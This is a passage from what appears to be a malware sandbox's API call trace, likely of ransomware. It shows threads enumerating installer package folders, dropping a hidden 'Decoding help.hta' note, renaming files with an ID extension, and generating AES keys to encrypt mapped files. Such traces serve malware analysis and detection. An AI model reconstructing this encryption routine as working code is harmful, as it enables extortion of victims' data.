dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0058.482] FindClose (in: hFindFile=0x5e2770 | out: hFindFile=0x5e2770) returned 1 Thread: id = 675 os_tid = 0xed4 [0054.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x13c1fd30 | out: lpFindFileData=0x13c1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2c70 [0054.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.455] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x13c1fd30 | out: lpFindFileData=0x13c1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.455] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.456] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x13c1fd30 | out: lpFindFileData=0x13c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c0e500, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd3c0e500, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd3c0e500, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x165257, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.456] lstrcpyW (in: lpString1=0x10978870, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0054.456] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 119 [0054.456] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0054.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0xffffffff [0054.456] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d0 [0056.947] WriteFile (in: hFile=0x5d0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x13c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x13c1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.484] CloseHandle (hObject=0x5d0) returned 1 [0058.485] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.485] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.485] lstrlenW (lpString="cab1.cab") returned 8 [0058.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0058.485] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 119 [0058.485] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0058.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0058.485] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.485] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.485] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x13c1fd30 | out: lpFindFileData=0x13c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7a0c00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfd7a0c00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfd7a0c00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0058.485] lstrcpyW (in: lpString1=0x2a7a0418, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0058.485] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 119 [0058.485] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0058.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0x1 [0058.486] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeMinimum_x64.msi") returned -1 [0058.486] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0058.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0058.486] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 119 [0058.486] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0058.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0058.486] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0058.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.487] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d0 [0058.487] CreateFileMappingA (hFile=0x5d0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x448 [0058.487] CryptAcquireContextA (in: phProv=0x13c1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x13c1fcec*=0x2aac6990) returned 1 [0060.224] CryptGenKey (in: hProv=0x2aac6990, Algid=0x6610, dwFlags=0x1, phKey=0x13c1fce8 | out: phKey=0x13c1fce8*=0x10f14380) returned 1 [0060.224] CryptExportKey (in: hKey=0x10f14380, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x13c1fbe4, pdwDataLen=0x13c1fce4 | out: pbData=0x13c1fbe4*, pdwDataLen=0x13c1fce4*=0x2c) returned 1 [0060.224] MapViewOfFile (hFileMappingObject=0x448, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24000) returned 0xd9d0000 Thread: id = 676 os_tid = 0xed8 [0054.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*.*", lpFindFileData=0x1505fd30 | out: lpFindFileData=0x1505fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db8b8 [0056.862] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.862] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0x1505fd30 | out: lpFindFileData=0x1505fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.862] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.862] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.862] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0x1505fd30 | out: lpFindFileData=0x1505fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0056.862] FindClose (in: hFindFile=0x5db8b8 | out: hFindFile=0x5db8b8) returned 1 Thread: id = 677 os_tid = 0xedc [0054.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x156dfd30 | out: lpFindFileData=0x156dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x2c072790, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6715f0 [0059.153] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.154] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x156dfd30 | out: lpFindFileData=0x156dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x2c072790, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2c072790, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.613] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.613] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.613] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x156dfd30 | out: lpFindFileData=0x156dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c0e500, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd3c0e500, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd3c0e500, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x4f699e, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0059.613] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0059.613] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned 120 [0059.613] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" [0059.613] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\decoding help.hta")) returned 0x20 [0059.613] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0059.613] lstrlenW (lpString="cab1.cab") returned 8 [0059.613] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0059.613] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned 120 [0059.613] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0059.613] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0059.613] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0059.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.898] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xdd4 [0060.898] CreateFileMappingA (hFile=0xdd4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd9c [0060.898] CryptAcquireContextA (phProv=0x156dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 678 os_tid = 0xee0 [0054.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*", lpFindFileData=0xf70fd30 | out: lpFindFileData=0xf70fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2c30 [0054.457] lstrcmpW (lpString1=".", 